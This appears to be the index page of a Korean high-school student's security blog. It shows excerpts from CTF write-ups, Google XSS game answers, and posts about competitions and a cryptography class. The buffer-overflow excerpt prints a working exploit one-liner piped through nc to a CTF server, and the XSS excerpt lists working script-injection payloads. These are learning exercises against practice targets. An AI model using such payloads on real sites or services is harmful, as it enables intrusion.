kangsecu's B1og

1. Basic_BOF #1 binary : main : 뭐 굳이 쉘코드를 넣을 필요도 없다. 그냥 v5변수 값이 -559038737이면 되는데 이게 0xDEADBEEF이다. payload : 2. Basic_BOF #2 binary : main : 이번에도 딱히 뭐 없다. 그냥 v5변수에 sup함수를 넣는다. 그럼 여기서 128바이트를 더미로 채우고 0804849b를 ret로 넘겨주면 된다. payload : dummy(128) + p32(0x0804849b) $(python -c 'print "A"*128 + "\x9b\x84\x04\x08"'; cat) | nc ctf.j0n9hyun.xyz 3001 3. Basic_FSB binary : main : vuln : 이 함수의 snprintf와 밑에 ..

이번에도 마찬가지로 blog.h3x0r.kr에 업로드하였던 글 입니다. 오류 지적은 감사히 받겠습니다.

오랜만에 글을 씁니다. 그래서 뭘 써야할지 모르겠어서 우선 최근근황부터...1.서울여자대학교 정보보호영재교육원 수료 + 개인전 노력상 + 단체전 노력상예 . 2.정보보호경진대회에 본선이렇게 후드티와 명찰 및 개인 데스크탑이 지정됩니다. 이건 대회종료 후 서울대학교에서 제공된 밥입니다.이건 다음날 시상식 전에 서울대학교 호암교수회관의 조식뷔페를 제공받은 사진입니다.3.고등해커 예선 4등 > 본선5등고등해커 예선에서는 4등을 하였습니다.본선에서는 5등을 차지하여 동상을 받게되었습니다. 4.Devit시큐리티Devit Security라는 청소년 스타트업에 합류하게되었습니다. 주업무는 웹 프로그래밍 및 웹 관리 쪽이구요.Darkweb.kr 이라는 개발자,보안을 공부하는 사람들을 위한 지식,자료 공유 및 워게임 등..

2018 H3X0R ctf write up 입니다. 저는 41등입니다. ㅎㅎ... MISC1. Mic Check(10p)H3X0R{lets get it} 2. 3D(420p)이 문제는 그냥 windows 3D print 프로젝트 파일이다. WorkPath에 문제를 덮은 후 열어주면 플래그가 있다. 3D view로 돌린 고 움직여주면 해결H3X0R{So_Useful_Paint_3D} 3.easy_png(210p)이 문제도 그냥 RGB청크의 위치를 알맞게 이동시키면 된다. H3X0R{Y0U_Ha7E} 4.RealrudaGaBabymisc(280p) 이 문제는 제가 출제한 문제입니다. 사실 문제 출제를 마감 전날까지 미루다가 낸 문제라서 퀄이.... (죄송합니다) 이 문제는 파일을 다운받으면 x,y 와 RGB..

xss game이란 xss(cross site scriping)을 초심자들이 쉽게 풀어볼 수 있도록 6단계로 구성되어있는 워게임입니다. 답만 올리도록 하겠습니다. 1.2.3.num=1’ onerror=‘alert(“kangsecu”)’>4.);alert(‘kangsecu5.?next=javascript:alert('kangsecu')6.https://xss-game.appspot.com/level6/frame#data:text/plain,alert('kangsecu') +++추가로 수정된 문제도 모두 해결하였습니다 .

2017년 작년 제 블로그의 티스토리 결산 결과를 확인하였습니다. 저는 IT기술과 보안기술을 간단하게 다루는 블로거인데 의외로 반응이 좋았던것 같습니다.그래서 작년에 가장 많은 분들이 조회하신 글을 살펴보니 제가 '선린인터넷고등학교'에 진학하기 위하여 제출 하였던 포트폴리오가 1위를 차지하였습니다.총 813분이 제 글을 읽어주셨습니다. 부족한 포트폴리오를 봐주셔서 감사합니다. 그리고 이만큼 '선린인터넷고등학교'에 관심을 가진 분들이 많다는 것을 알게 되었습니다. 다음은 나름(?) IT블로거로서 가장 많이 언급한 단어들입니다.항상 글을 시작하는 "이번"을 제일 많이 언급했고, 문제,코드,언어,해킹등이 있네요 앞으로 더 열심히 하는 블로거가 되겠습니다. 감사합니다.

7월 말에 국민대학교에서 진행하는 'science 대탐험 ' 프로그램에서 정보 보안 암호 수학과 수업을 들었다. 원래 보안과 관련된 행사, 프로그램은 꼭 찾아서 하는 편이라 이번 프로그램도 매우 관심을 가지고 지원했다. 이번엔 자기소개서와 공부해온 계기, 공부해온 것들 등의 여러 내용을 함께 기입해서 지원하는 것이었고, 운이 좋게도 붙은 것 같다. 그래서 국민대학교 과학관 310호에서 실제 정보 보안 암호 수학과 교수님들에게 수업을 들었다. 물론 실제 대학생들을 대상으로 하는 수업처럼 심층적이고 전문적이진 않았겠지만 그래도 암호 관련 강의에서 수학이 많이 나와서 힘들었다. 첫날엔 간단한 자기소개와 질문들을 받고 바로 국민대학교 '김동찬' 교수 님께서 평소 관심을 가지고 있었던 RSA , SHA , LEA..

이번에는 항상 관심이 있고 공부하던 보안에 관하여 최근 5년간의 해킹 사례에 대한 리포트를 올리도록 하겠습니다. 잘 봐주시길 바랍니다.